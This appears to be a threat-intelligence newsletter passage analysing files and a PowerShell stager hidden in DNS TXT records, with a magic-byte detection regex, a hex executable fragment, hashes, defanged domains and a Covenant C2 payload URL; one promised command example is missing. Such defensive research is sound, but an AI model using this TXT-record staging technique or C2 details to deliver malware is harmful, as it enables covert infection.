WEIS - Examining Newly Registered Phishing Domains at Scale 

Tools and Resources

INTERPOL - INTERPOL launches our new external newsletter  

Quad9 - Globe of Wonder - The good folks at Quad9 DNS have open-sourced their visualization tool for mapping realtime events onto a view of the Earth. 

Recent reports of hiding images in DNS records inspired an exploration for such files in the wild from passively collected DNS records available in DNSDB Scout. Put very simply, files can be partitioned and stored in DNS TXT records. They can then be retrieved via DNS requests and put back together. This also means these files may persist until the DNS server removes the records or overwrites them thereby providing a form of unwitting file or data storage. The initial report detailed the partitioning of image files and converting them to hexadecimal before issuing writes to a domain’s TXT records. For that reason, we began a search at the beginning of DNS RDATA TXT records for magic file bytes in hexadecimal format for a wide range of executables and common file types using regex patterns such as the following:

^"((ffd8ffe[0-9a-f].{12,})|(89504e47.{12,})|(47494638[79]61.{8,})|(255044462d.{10,})|(504b0304.{12,})|(4d5a.{16,59}|4d5a.{61,})|(7f454c46.{12,})|(c[ef]faedfe.{12,})|(1f8b08.{14,})|(377abcaf271c.{8,})|(526172211a07.{8,}))

One of the findings from 2021-2022 were TXT records beginning with the magic sequence for an executable file header.

C83464356139303030303330303030303030343030303030306666666630303030623830303030303030303030303030303430303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030306538303030303030306531666261306530306234303963643231623830313463636432313534363836393733323037303732366636373732363136643230363336313665366536663734323036323635

The same .exe header value was seen on 3 different domains, each sharing the same subdomain pattern. 

Digging into one of the domains, “*.felix.stf.whitetreecollective[.]com.”, we see that it has several hundreds of iterated subdomain integer values each with different TXT RDATA values. This suggested that they were fragmenting the .exe file across all the subdomains using the integer value to track the correct sequence.

By exporting the json of the domain TXT records and having a Generative AI throw a script together to piece the file back together in the correct order, we were able to observe the SHA256 file hashes of the files stored in DNS TXT records:

• 7ff0ecf2953b8662ede1577e330a514f09992c18aa3c14ed77cf2ffc115b0866
• e7b22ba761a7f853b63933ffe517cc61596710dbdee992a429ac1bc8d04186a1

Both files appear to be Joke Screenmate malware. These are a form of prank software and may commonly exhibit the following behaviors once run on machines:

• Simulating destructive actions: The program might display fake error messages, fictitious virus warnings, or animations that mimic the deletion of system files, causing panic for the user.
• Interfering with user control: Some screenmates are designed to be difficult to close, may multiply on the screen, or actively evade the user's mouse cursor.
• Displaying unsolicited content: These programs can present a continuous stream of jokes, images, or animations that can be distracting and difficult to stop.
• System performance issues: Like any running application, they consume system resources, and poorly coded screenmates can lead to system slowdowns or crashes.

A brief review of other TXT records for the 3 domains opened another line of inquiry, malicious commands stored in TXT records. This was seen with multiple TXT records associated to drsmitty[.]com such as the following subdomain’s TXT record: 15392.484f5fa5d2.dnsm.in.drsmitty[.]com.

The command contains an encoded Powershell script that acts as a stager and connects to another domain: cspg[.]pw. The URL it requests (/api/v1/nps/payload/stage1) is the default endpoint for a Covenant C2 server to serve its next-stage payload.

Being that the stager script is stored in a DNS TXT record is not by itself enough, some other action would have to take place first on a system to retrieve and execute the script such as the following:

In summary, in 2021-2022 an actor was using DNS TXT records to store and possibly deliver ScreenMate malware and stagers for likely Covenant C2 malware infections. The same C2 domain was seen in another domain’s TXT record in July 2017, msg1.rickrick.qa.urab[.]org.